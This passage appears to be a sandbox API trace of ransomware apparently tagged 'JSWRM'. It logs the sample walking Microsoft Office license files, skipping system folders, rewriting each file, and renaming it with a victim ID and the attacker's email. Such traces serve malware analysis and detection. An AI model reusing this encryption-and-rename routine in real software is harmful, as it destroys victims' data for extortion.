lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0109.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0109.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0109.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0109.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0109.458] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_kms_client-ul.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.459] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9611) returned 1 [0109.459] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2580) returned 0x24c1d0 [0109.459] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2580, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2580, lpOverlapped=0x0) returned 1 [0109.461] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.461] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2580, lpOverlapped=0x0) returned 1 [0109.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.461] CloseHandle (hObject=0x45c) returned 1 [0109.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0109.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0109.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0109.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0109.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0109.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0109.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0109.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0109.462] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_kms_client-ul.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_KMS_Client-ul.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_kms_client-ul.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0109.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0109.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0109.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0109.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0109.463] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea615dc4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea615dc4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea6d493a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2983, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusVL_MAK-pl.xrm-ms", cAlternateFileName="PR728D~1.XRM")) returned 1 [0109.463] lstrcmpiW (lpString1="ProPlusVL_MAK-pl.xrm-ms", lpString2=".") returned 1 [0109.463] lstrcmpiW (lpString1="ProPlusVL_MAK-pl.xrm-ms", lpString2="..") returned 1 [0109.463] lstrcmpiW (lpString1="ProPlusVL_MAK-pl.xrm-ms", lpString2="...") returned 1 [0109.463] lstrcmpiW (lpString1="ProPlusVL_MAK-pl.xrm-ms", lpString2="windows") returned -1 [0109.463] lstrcmpiW (lpString1="ProPlusVL_MAK-pl.xrm-ms", lpString2="recovery") returned -1 [0109.463] lstrcmpiW (lpString1="ProPlusVL_MAK-pl.xrm-ms", lpString2="perflogs") returned 1 [0109.463] lstrcmpiW (lpString1="ProPlusVL_MAK-pl.xrm-ms", lpString2="documents and settings") returned 1 [0109.463] lstrcmpiW (lpString1="ProPlusVL_MAK-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.463] lstrcmpiW (lpString1="ProPlusVL_MAK-pl.xrm-ms", lpString2="system volume information") returned -1 [0109.463] lstrcmpiW (lpString1="ProPlusVL_MAK-pl.xrm-ms", lpString2="msocache") returned 1 [0109.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_MAK-pl.xrm-ms", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0109.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0109.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_MAK-pl.xrm-ms", cchWideChar=23, lpMultiByteStr=0x241358, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 23 [0109.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0109.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_MAK-pl.xrm-ms", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0109.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0109.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_MAK-pl.xrm-ms", cchWideChar=23, lpMultiByteStr=0x240f70, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 23 [0109.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0109.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0109.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0109.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0109.464] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_mak-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.465] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10627) returned 1 [0109.465] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24c1d0 [0109.465] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2980, lpOverlapped=0x0) returned 1 [0109.467] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.467] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2980, lpOverlapped=0x0) returned 1 [0109.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.467] CloseHandle (hObject=0x45c) returned 1 [0109.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0109.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0109.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0109.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0109.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0109.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0109.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.467] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_mak-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_MAK-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_mak-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0109.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0109.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0109.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0109.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0109.469] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaa681e4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeaa681e4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeab994cd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x280b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusVL_MAK-ppd.xrm-ms", cAlternateFileName="PR38D3~1.XRM")) returned 1 [0109.469] lstrcmpiW (lpString1="ProPlusVL_MAK-ppd.xrm-ms", lpString2=".") returned 1 [0109.469] lstrcmpiW (lpString1="ProPlusVL_MAK-ppd.xrm-ms", lpString2="..") returned 1 [0109.469] lstrcmpiW (lpString1="ProPlusVL_MAK-ppd.xrm-ms", lpString2="...") returned 1 [0109.469] lstrcmpiW (lpString1="ProPlusVL_MAK-ppd.xrm-ms", lpString2="windows") returned -1 [0109.469] lstrcmpiW (lpString1="ProPlusVL_MAK-ppd.xrm-ms", lpString2="recovery") returned -1 [0109.469] lstrcmpiW (lpString1="ProPlusVL_MAK-ppd.xrm-ms", lpString2="perflogs") returned 1 [0109.469] lstrcmpiW (lpString1="ProPlusVL_MAK-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0109.469] lstrcmpiW (lpString1="ProPlusVL_MAK-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.469] lstrcmpiW (lpString1="ProPlusVL_MAK-ppd.xrm-ms", lpString2="system volume information") returned -1 [0109.469] lstrcmpiW (lpString1="ProPlusVL_MAK-ppd.xrm-ms", lpString2="msocache") returned 1 [0109.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0109.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_MAK-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0109.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0109.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_MAK-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x241268, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0109.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0109.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_MAK-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0109.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0109.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_MAK-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x2411c8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0109.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0109.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0109.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0109.469] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_mak-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.470] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10251) returned 1 [0109.470] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2800) returned 0x24c1d0 [0109.470] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2800, lpOverlapped=0x0) returned 1 [0109.514] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.514] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2800, lpOverlapped=0x0) returned 1 [0109.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.515] CloseHandle (hObject=0x45c) returned 1 [0109.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0109.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0109.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0109.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0109.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0109.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0109.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0109.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0109.516] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_mak-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_MAK-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_mak-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0109.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0109.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0109.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0109.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0109.518] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaa41f69, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeaa41f69, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeab4cfd7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d42, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusVL_MAK-ul-oob.xrm-ms", cAlternateFileName="PR1E69~1.XRM")) returned 1 [0109.518] lstrcmpiW (lpString1="ProPlusVL_MAK-ul-oob.xrm-ms", lpString2=".") returned 1 [0109.518] lstrcmpiW (lpString1="ProPlusVL_MAK-ul-oob.xrm-ms", lpString2="..") returned 1 [0109.518] lstrcmpiW (lpString1="ProPlusVL_MAK-ul-oob.xrm-ms", lpString2="...") returned 1 [0109.518] lstrcmpiW (lpString1="ProPlusVL_MAK-ul-oob.xrm-ms", lpString2="windows") returned -1 [0109.518] lstrcmpiW (lpString1="ProPlusVL_MAK-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0109.518] lstrcmpiW (lpString1="ProPlusVL_MAK-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0109.518] lstrcmpiW (lpString1="ProPlusVL_MAK-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0109.518] lstrcmpiW (lpString1="ProPlusVL_MAK-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.518] lstrcmpiW (lpString1="ProPlusVL_MAK-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0109.518] lstrcmpiW (lpString1="ProPlusVL_MAK-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0109.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0109.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_MAK-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0109.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0109.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_MAK-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x240fc0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0109.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0109.519] 